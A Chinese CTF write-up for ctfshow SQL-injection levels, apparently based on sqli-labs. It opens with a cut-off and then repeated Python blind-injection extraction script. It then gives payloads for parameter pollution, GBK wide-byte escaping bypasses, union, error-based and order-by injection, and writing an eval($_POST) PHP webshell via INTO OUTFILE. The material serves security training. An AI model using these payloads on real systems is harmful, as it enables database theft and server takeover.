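STOP_CHAR = '}'              # closing brace of the flag

__all__ = ['bisect_char', 'extract_flag', 'main']


def bisect_char(oracle, pos, low=LOW, high=HIGH):
    """Recover the character at 1-based position *pos* by binary search.

    ``oracle(pos, mid)`` must answer True iff ``ascii(char) < mid``.  The loop keeps
    ``low <= ord(char) < high`` and stops once the interval is one wide.  A code
    outside [low, high) cannot be detected and comes back as ``chr(low)`` or
    ``chr(high - 1)``; re-check by hand if the result looks odd.
    """
    while high - low > 1:
        mid = low + (high - low) // 2
        if oracle(pos, mid):
            high = mid
        else:
            low = mid
    return chr(low)


def extract_flag(oracle, max_len=MAX_LEN, stop_char=STOP_CHAR):
    """Recover up to *max_len* characters, printing progress after each one.

    Returns the recovered string and stops as soon as *stop_char* is seen.
    """
    flag = ''
    for pos in range(1, max_len + 1):
        ch = bisect_char(oracle, pos)
        flag += ch
        print(flag)
        if ch == stop_char:
            break
    return flag


def main():
    """Drive the extraction against the live challenge over HTTP."""
    import requests  # local import keeps the pure search code importable without it

    session = requests.Session()

    def oracle(pos, mid):
        payload = PAYLOAD.format(pos, mid)
        print(payload)
        for attempt in range(1, RETRIES + 1):
            try:
                return TRUE_MARKER in session.get(URL, params={'id': payload}, timeout=TIMEOUT).text
            except (requests.exceptions.Timeout, requests.exceptions.ConnectionError):
                if attempt == RETRIES:
                    raise
                time.sleep(1)  # back off briefly before retrying the same probe

    extract_flag(oracle)


if __name__ == '__main__':
    main()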
28、28a——过滤select、union
('
的闭合
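import time

# ctfshow levels 28/28a -- boolean-based blind SQLi over GET in a ('...') context.
# The WHERE becomes id=(('a')||if(cond,1,0)||('0')): when cond holds it evaluates to
# id=1 and the page shows that row's username 'Dumb'; otherwise no row comes back.
URL = 'http://04b40f35-7758-4fc4-9114-d74500be76c8.challenge.ctf.show:8080/'
PAYLOAD = "a')||if(ascii(substr((select(group_concat(flag4s))from(ctfshow.flags)),{},1))<{},1,0)||('0"
TRUE_MARKER = 'Dumb'         # username of the id=1 row, shown only when the condition is true
TIMEOUT = 5                  # the original used 1s and crashed on the first slow response
RETRIES = 3                  # transient network failures are retried instead of aborting the run
MAX_LEN = 99                 # original loop was range(1, 100): at most 99 characters
LOW, HIGH = 32, 128          # half-open search interval for each character's ASCII code
STOP_CHAR = '}'              # closing brace of the flag

__all__ = ['bisect_char', 'extract_flag', 'main']


def bisect_char(oracle, pos, low=LOW, high=HIGH):
    """Recover the character at 1-based position *pos* by binary search.

    ``oracle(pos, mid)`` must answer True iff ``ascii(char) < mid``.  The loop keeps
    ``low <= ord(char) < high`` and stops once the interval is one wide.  A code
    outside [low, high) cannot be detected and comes back as ``chr(low)`` or
    ``chr(high - 1)``; re-check by hand if the result looks odd.
    """
    while high - low > 1:
        mid = low + (high - low) // 2
        if oracle(pos, mid):
            high = mid
        else:
            low = mid
    return chr(low)


def extract_flag(oracle, max_len=MAX_LEN, stop_char=STOP_CHAR):
    """Recover up to *max_len* characters, printing progress after each one.

    Returns the recovered string and stops as soon as *stop_char* is seen.
    """
    flag = ''
    for pos in range(1, max_len + 1):
        ch = bisect_char(oracle, pos)
        flag += ch
        print(flag)
        if ch == stop_char:
            break
    return flag


def main():
    """Drive the extraction against the live challenge over HTTP."""
    import requests  # local import keeps the pure search code importable without it

    session = requests.Session()

    def oracle(pos, mid):
        payload = PAYLOAD.format(pos, mid)
        print(payload)
        for attempt in range(1, RETRIES + 1):
            try:
                return TRUE_MARKER in session.get(URL, params={'id': payload}, timeout=TIMEOUT).text
            except (requests.exceptions.Timeout, requests.exceptions.ConnectionError):
                if attempt == RETRIES:
                    raise
                time.sleep(1)  # back off briefly before retrying the same probe

    extract_flag(oracle)


if __name__ == '__main__':
    main()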
29、30、31——双服务器
apache是最终处理并返回数据的服务器,但在它接收到数据前还有个tomcat服务器,它的存在一般都是起到过滤数据的作用(类似WAF那样吧)
按理来说似乎没问题,但这里的问题就出在两个服务器对同名参数的处理不一致,如下图(图略):Apache 取的是最后一个同名参数,而 Tomcat 取第一个。如果把 Tomcat 当作 WAF 使用,是完全起不到作用的,因为可以参数污染(HTTP Parameter Pollution)
index.php?id=1&id=2' union select....
上面这例子就是参数污染,Tomcat接收第一个参数发现没问题,发送请求给Apache,但Apache是接收最后一个有问题的参数!
payload:
?id=2&id=-1'union select 1,2,group_concat(flag4s) from ctfshow.flags-- +
32、33——Bypass addslashes()
、GET型宽字节注入
问题代码:
mysql_query("SET NAMES gbk");
造成宽字节注入的原因是连接字符集被设成了 GBK,转义却仍按单字节进行:addslashes() 在单引号前加的反斜杠是 0x5c,而 `%df%5c` 在 GBK 里恰好是一个合法的双字节字符,反斜杠被“吃掉”,单引号重新生效。%df、%81、%E6 等高位字节
均可绕过
?id=%df' union select 1,2,group_concat(flag4s) from ctfshow.flags-- -
34——Bypass addslashes()
、POST型宽字节注入、�
这里要注意直接在浏览器里提交%df'
会被URL编码,因为是POST传参。%df
被编码为%25df
,这时候就不成功了,所以可以在burp里提交%df
。
看Y4大佬是直接提交�'
的,直接将�当作%df被utf-8解码过的字符提交上去,学到了!�
的编码是%EF%BF%BD
对POST、GET型宽字节注入传参的分析:
抓包后可以看到 Content-Type: application/x-www-form-urlencoded,带这个头时服务端会对请求体做一次 URL 解码。
区别在浏览器这一侧:
- 表单 POST 会把整个值无差别地做 URL 编码,`%` 本身也会被编成 `%25`
- 地址栏里的 GET 参数只编码非法字符:已有的 `%xx` 序列原样保留,不会再多编码一次
- 但 `'` 这类字符会被编成 `%27`
讲讲三种输入方式的流程(注意 %5c 是服务端 addslashes() 加上的反斜杠,不是浏览器编码出来的):
GET方式:传入 %df' ,服务端 URL 解码得到字节 df 27,addslashes() 后变成 df 5c 27(即%df\'),按 gbk 解码时 df5c 合成一个汉字“運”,后面的单引号保留下来
POST方式(浏览器表单):传入 %df' ,浏览器先把 % 本身编码,发出去的是 %25df%27,服务端解码后得到字面量 %df' ,addslashes() 后变成 %df\' ,这里的单引号就被转义而无法起到闭合的作用了
GET、POST方式:传入 �'(U+FFFD),浏览器编码为 %EF%BF%BD%27,服务端解码后 addslashes() 得到 ef bf bd 5c 27,按 gbk 解码为“锟絓”加一个未转义的单引号
很明显,第一第三种都起到了闭合单引号的作用,但第二种输入方式是不行的
35——Bypass addslashes()
、数字型宽字节注入
addslashes() 只会在引号、反斜杠和 NUL 前加反斜杠,
数字型的 SQL 语句不需要引号闭合,所以它基本不起作用,直接union注入就好了
?id=-1 union select 1,2,group_concat(flag4s) from ctfshow.flags-- -
36——MySQL_real_escape_string
`mysql_real_escape_string()` 也会在单引号前加反斜杠。
它按连接字符集来转义,但前提是字符集要通过 mysql_set_charset() 设置;如果只是用 `SET NAMES gbk` 设的,它并不知道连接是 GBK,仍按单字节转义,宽字节绕过照样成立(从下面的 payload 能打通来看,本题应该就是这种情况)
?id=-1�' union select 1,2,group_concat(flag4s) from ctfshow.flags-- -
37——MySQL_real_escape_string
测试语句:
�' union select 1,3#
38——MySQL_real_escape_string
和前面太相似了,就是换个了函数,但都会造出斜杠从而被利用
?id=�' union select 1,2,group_concat(flag4s) from ctfshow.flags-- -
39——堆叠注入
// Level 39 (quoted from the challenge): numeric context with no quoting, and the
// query is run through mysqli_multi_query(), which executes ';'-separated
// statements -> stacked queries are possible here.  (The union payload used for
// this level does not actually need that.)
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
/* execute multi query */
if (mysqli_multi_query($con1, $sql))
{
......
}
mysqli_multi_query()
函数执行一个或多个针对数据库的查询,多个查询用分号进行分隔(有这个才能进行堆叠)。不过这一题直接用联合查询就能拿到 flag,并不需要真的堆叠:
?id=-1 union select 1,2,group_concat(flag4s) from ctfshow.flags-- -
40——
?id=-1') union select 1,2,group_concat(flag4s) from ctfshow.flags-- -
41——
?id=-1 union select 1,2,group_concat(flag4s) from ctfshow.flags-- -
41(原文编号重复,此节是密码处的报错注入)——
在密码处进行报错注入:
aa' or extractvalue(1,concat(0x7e,user(),0x7e))-- -
aa' or extractvalue(1,concat(0x7e,mid((select group_concat(flag4s) from ctfshow.flags),20,30),0x7e))-- -
42——
aa') or extractvalue(1,concat(0x7e,mid((select group_concat(flag4s) from ctfshow.flags),1,30),0x7e))-- -
43——order by 注入
$sql = "SELECT * FROM users ORDER BY $id";
order by注入不同于where后面的注入,它不可以使用union联合查询注入
测试order by的语句:看看是否有不同的显示顺序
?sort=1 asc 顺序
?sort=1 desc 倒序
报错注入、时间盲注都行
?sort=1 or extractvalue(1,concat(0x7e,mid((select group_concat(flag4s) from ctfshow.flags),1,30),0x7e))
44——order by 注入
?sort=1' or extractvalue(1,concat('~',mid((select group_concat(flag4s) from ctfshow.flags),1,30),'~'))-- -
45——order by 注入
?sort=1 into outfile '/var/www/html/1.php' lines terminated by '<?php eval($_POST[1]);?>' -- -
46——order by 注入
写shell的几种方式:
1:union select 写入
select * from stu where id=1 union select 1,2,'<?=phpinfo();?>' into dumpfile '/var/www/html/1.php'-- -
2. lines terminated by 写入(在行末尾写入)
select * from stu where id=1 into dumpfile '/var/www/html/1.php' lines terminated by '<?php phpinfo() ?>'-- -
3.lines starting by 写入(在行头写入)
select * from stu where id=1 into dumpfile '/var/www/html/1.php' lines starting by '<?php phpinfo() ?>'-- -
4.fields terminated by 写入(在每个字段后写入)
select * from stu where id=1 into dumpfile '/var/www/html/1.php' fields terminated by '<?php phpinfo() ?>'-- -
5.columns terminated by 写入(在每个字段后写入)
select * from stu where id=1 into dumpfile '/var/www/html/1.php' columns terminated by '<?php phpinfo() ?>'-- -
写shell(前提:MySQL 账号有 FILE 权限、secure_file_priv 没有限制导出目录,且 /var/www/html 对 MySQL 进程可写):
?sort=1 into outfile "/var/www/html/1.php" lines terminated by 0x3c3f706870206576616c28245f504f53545b315d293b3f3e -- -
方法一:通过一句话木马执行 PHP(POST 参数名是 1,对应 `eval($_POST[1])`,下面 `1=` 后面就是参数值)
1=include './sql-connections/db-creds.inc';
include './sql-connections/sql-connect-1.php';
$sql="SELECT flag4s FROM ctfshow.flags";
$result=mysql_query($sql) or die("error in function table_name()".mysql_error());
$row = mysql_fetch_array($result);
print_r($row);
方法二:在蚁剑上操作(这个简单一点)
蚁剑连接一下即可,连接数据库的信息在 /var/www/html/sql-connections/db-creds.inc
47——order by 注入
?sort=1 into outfile "/var/www/html/1.php" lines terminated by 0x3c3f706870206576616c28245f504f53545b315d293b3f3e -- -
类似上面
51——order by 注入
多了个单引号来闭合